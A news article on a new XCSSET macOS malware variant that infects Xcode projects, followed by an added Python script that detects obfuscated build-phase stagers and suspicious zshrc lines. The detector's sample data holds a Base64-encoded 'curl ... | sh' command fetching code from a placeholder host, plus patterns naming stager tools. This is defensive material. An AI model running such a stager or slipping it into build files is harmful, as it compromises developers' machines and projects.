
A recent discovery of the XCSSET malware targeting macOS


Microsoft has issued a warning about a new variant of the XCSSET malware, a modular macOS malware family regarded as one of the most serious threats to the platform. The updated version has so far been seen in a limited number of attacks against Apple developers, but researchers expect its reach could grow considerably in the coming weeks.

XCSSET can dump data from Safari, inject JavaScript backdoors into websites the victim visits, steal information from apps such as Skype, Telegram and WeChat, capture screenshots, encrypt files, and exfiltrate data to attacker-controlled servers. According to Microsoft Threat Intelligence, the latest iteration adds improved obfuscation, updated persistence mechanisms and new infection strategies, and is the first documented update to the family since 2022.

“These enhanced features complement the existing capabilities of this malware family, which include targeting digital wallets, gathering data from the Notes app, and transferring system information and files,” the post stated.

XCSSET was first identified in 2020, when Trend Micro researchers found it while investigating a security incident involving Xcode developer projects. Rather than attacking end users directly, the malware targets software developers, exploiting vulnerabilities and injecting itself into their Xcode projects, which then become the vehicle for further spread: anyone who downloads and builds an infected project has their own projects infected in turn. That wormable behaviour is what turns a single compromised developer into a supply chain attack.

The updated variant marks a significant evolution of this modular malware, adding features that make it easier for attackers to spread XCSSET while hiding their activity. Payloads used to infect Xcode projects are now generated with more randomised obfuscation, including Base64 encoding and obfuscated module names, so that the intent of the injected code is less obvious on inspection.

The new variant also adds two persistence mechanisms, which Microsoft calls the “zshrc” method and the “dock” method. The zshrc method writes the payload to a file and adds a line to the user's ~/.zshrc so that the file runs every time a new shell session starts. The dock method downloads a signed dock-management tool from the command-and-control server and uses it to replace legitimate Dock entries with fake ones that launch the malicious payload alongside the expected application.

The infection routine has also changed: where the payload is placed inside an Xcode project is now chosen according to one of several strategies (TARGET, RULE or FORCED_STRATEGY), which helps the injected code blend in with the project and evade detection.
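As an added example, not code from the original article or from Microsoft's post, the following Python script applies simple triage heuristics for the two artefacts described above: a "Run Script" build phase in an Xcode project.pbxproj that decodes Base64 and pipes the result to a shell, and a line in a zsh start-up file that sources a file from a hidden path that is not a well-known tool. The pbxproj and zshrc contents, the `.zshrc_aliases` file name and the `example.invalid` URL are constructed samples; the regex over the pbxproj text is a heuristic, not a full parser, and it does not distinguish between the TARGET, RULE and FORCED_STRATEGY placements.

```python
"""Heuristic triage for XCSSET-style Xcode and zshrc artefacts.

Added example, not Microsoft's or Trend Micro's code.  It regex-scans the
text form of an Xcode project.pbxproj for build-phase scripts that decode
Base64 and hand the result to a shell, and scans zsh start-up files for
lines that source or run a file under a hidden path that is not a known
tool.  All sample inputs below are constructed; example.invalid is a
placeholder, not a real XCSSET host.
"""
import base64
import re
from typing import List, Tuple

# A quoted shellScript value in pbxproj: backslash escapes, terminated by ";
SHELL_SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:\\.|[^"\\])*)";')
# "... | base64 -D | sh" or 'eval "$(... base64 ...)"'
SUSPICIOUS_PIPE_RE = re.compile(
    r'base64\s+(?:-d|-D|--decode)\b.*?\|\s*(?:sh|bash|zsh|eval)\b'
    r'|\beval\s+"?\$\(.*?base64', re.S)
# Long Base64-looking runs inside a build script
B64_BLOB_RE = re.compile(r'[A-Za-z0-9+/]{40,}={0,2}')
# Commands a decoded first stage typically contains
STAGER_RE = re.compile(r'\b(curl|wget|osascript|launchctl|plutil)\b')

# Lines in ~/.zshrc that run another file: "source x", ". x", "sh x", "eval x"
EXEC_LINE_RE = re.compile(r'^\s*(?:source|\.|sh|bash|zsh|eval)\s+(\S+)', re.M)
# Hidden directories/files that legitimately get sourced from a shell rc
KNOWN_HIDDEN = {'.oh-my-zsh', '.nvm', '.cargo', '.pyenv', '.rbenv', '.fzf',
                '.sdkman', '.zshrc', '.zprofile', '.zshenv', '.p10k.zsh'}


def unescape_pbx(s: str) -> str:
    """Undo the backslash escapes pbxproj uses inside quoted strings."""
    return re.sub(r'\\(.)', lambda m: {'n': '\n', 't': '\t'}.get(m.group(1), m.group(1)), s)


def decode_blobs(script: str) -> List[str]:
    """Return the plaintext of every well-formed Base64 run in a script."""
    out = []
    for m in B64_BLOB_RE.finditer(script):
        try:
            out.append(base64.b64decode(m.group(0), validate=True).decode('utf-8', 'replace'))
        except (ValueError, UnicodeDecodeError):
            pass  # not valid Base64, ignore
    return out


def scan_pbxproj(text: str) -> List[Tuple[str, str]]:
    """Flag build-phase scripts that look like an obfuscated stager.

    Returns (first 60 chars of the script, reason) for each suspicious phase.
    """
    findings = []
    for m in SHELL_SCRIPT_RE.finditer(text):
        script = unescape_pbx(m.group(1))
        reasons = []
        if SUSPICIOUS_PIPE_RE.search(script):
            reasons.append('decodes Base64 and pipes it to a shell')
        for blob in decode_blobs(script):
            hit = STAGER_RE.search(blob)
            if hit:
                reasons.append('Base64 payload runs ' + hit.group(1))
        if reasons:
            findings.append((script.strip()[:60], '; '.join(reasons)))
    return findings


def scan_zshrc(text: str) -> List[str]:
    """Flag rc lines that source/run a file under a hidden path not in the allowlist."""
    hits = []
    for m in EXEC_LINE_RE.finditer(text):
        target = m.group(1).strip('"\'')
        hidden = [seg for seg in target.split('/')
                  if seg.startswith('.') and seg not in ('.', '..')]
        if hidden and not any(seg in KNOWN_HIDDEN for seg in hidden):
            hits.append(m.group(0).strip())
    return hits


# --- constructed samples (not real XCSSET artefacts) ----------------------
_STAGER = 'curl -fsSL https://example.invalid/drop | sh'   # placeholder URL
_BLOB = base64.b64encode(_STAGER.encode()).decode()
SAMPLE_PBXPROJ = f'''
    AA11 /* ShellScript */ = {{
        isa = PBXShellScriptBuildPhase;
        name = "Run Script";
        shellScript = "# Type a script or drag a script file here\\necho \\"$BUILT_PRODUCTS_DIR\\"\\n";
    }};
    BB22 /* ShellScript */ = {{
        isa = PBXShellScriptBuildPhase;
        shellScript = "echo {_BLOB} | base64 -D | sh\\n";
    }};
'''
SAMPLE_ZSHRC = '''
export PATH="$HOME/bin:$PATH"
source $HOME/.oh-my-zsh/oh-my-zsh.sh
source ~/.zshrc_aliases
[ -s "$NVM_DIR/nvm.sh" ] && . "$NVM_DIR/nvm.sh"
'''

if __name__ == '__main__':
    for snippet, why in scan_pbxproj(SAMPLE_PBXPROJ):
        print(f'[pbxproj] {why}: {snippet!r}')
    for line in scan_zshrc(SAMPLE_ZSHRC):
        print(f'[zshrc]   suspicious rc line: {line}')
```

Run against a real checkout by reading `*.xcodeproj/project.pbxproj` and `~/.zshrc` into `scan_pbxproj` and `scan_zshrc`; anything flagged deserves a manual look at the decoded script before the project is built, since a build phase runs with the developer's privileges.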

Given the growing volume of malware aimed at macOS in recent years, Microsoft advises developers and users to be careful when downloading Xcode projects: verify the authenticity of projects pulled from repositories, and install applications only from trusted sources such as official app stores.

Microsoft says that Defender for Endpoint on Mac detects all known versions of XCSSET and its variants.

